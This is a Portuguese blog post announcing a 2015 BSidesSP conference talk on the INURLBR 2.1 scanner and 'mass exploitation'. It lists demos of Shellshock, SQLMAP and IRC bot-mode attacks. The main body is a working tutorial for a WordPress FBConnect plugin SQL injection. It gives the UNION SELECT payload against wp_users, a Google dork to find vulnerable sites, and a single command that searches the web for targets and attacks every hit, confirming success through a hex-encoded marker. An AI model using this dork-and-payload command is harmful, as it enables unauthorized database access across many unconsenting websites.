Apresentação - Co0L BSidesSP v11 / Brazilian Arsenal - 24/05/2015

DIVULGAÇÃO TOOL INURLBR 2.1 + Conceitos de exploração em massa.

Mais uma vez tenho a grande satisfação de participar da conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) que é uma mini-conferência sobre segurança da informação organizada por profissionais de mercado com o apoio do Garoa Hacker Clube com o objetivo de promover a inovação, discussão e a troca de conhecimento, além de divulgar os valores positivos e inovadores da cultura hacker. 

Fiquei em uma divisão chamada Brazilian Arsenal, Brazilian Arsenal é um espaço para divulgar os projetos de ferramentas de segurança Open Source desenvolvidas por brasileiros, com objetivo de divulgar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para estes projetos.
No início cada projeto tem um espaço de até 10 minutos para se apresentar (no ritmo de Lightning Talks). Em seguida, iremos realizar atividades mão na massa, a escolha do mantenedor de cada projeto, que pode incluir um installfest, um laboratório ou mesmo um "hackaton", aonde os presentes são convidados a desenvolver uma feature ou corrigir um bug do projeto.

Dentro desse tempo tentei passar um poucos sobre conceitos para exploração em massa de alvos, dentre eles expliquei sobre mini-exploit(defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo.) e novidades da ferramenta INURLBR 2.1.

[ + ] Grade da apresentação:
Titulo: INURLBR 2.1 - Mass Exploit
Conteúdo:

• - Introdução básica da ferramenta.
• - Explicação novidades código.
• - Conceito mini-exploit.
• - Criação de mini-exploit
• - Mini-exploit(Shellshock);
• - Exploração em massa mini-exploit(Shellshock);
• - Mini-exploit(SQLMAP);
• - Exploração em massa mini-exploit(SQLMAP);
• - Modo Bot enviando resultados pro server IRC.
• - Exploração Wordpress Arbitrary File Download.
• - Uso de sub_processo otimizando tempo.
• - perguntas.
• - fim.
  

Acesso: https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/Brazilian_Arsenal/INURLBR_2.1_-_Mass_Exploit 

 

SLIDE APRESENTAÇÃO

https://docs.google.com/presentation/d/1DSc7Qfa-ER0nmToDwBA2X8nC8f2723_bVXxHay01kjs/pub?start=false&loop=false&delayms=3000

Download INURLBR 2.1

https://github.com/googleinurl/SCANNER-INURLBR

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 

---------------------------------------------------------------------------

[ + ] OUTPUT VULN
-s sqli.txt  

---------------------------------------------------------------------------

[ + ] ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6 

---------------------------------------------------------------------------

[ + ] EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'

---------------------------------------------------------------------------

[ + ] TYPE INTERNAL VALIDATION
-t 2 

---------------------------------------------------------------------------

[ + ] SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 

---------------------------------------------------------------------------

[ + ] FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique

---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)

---------------------------------------------------------------------------

- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.

Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.


Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.


if(HTML == xpl_success){ OK }


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VÍDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790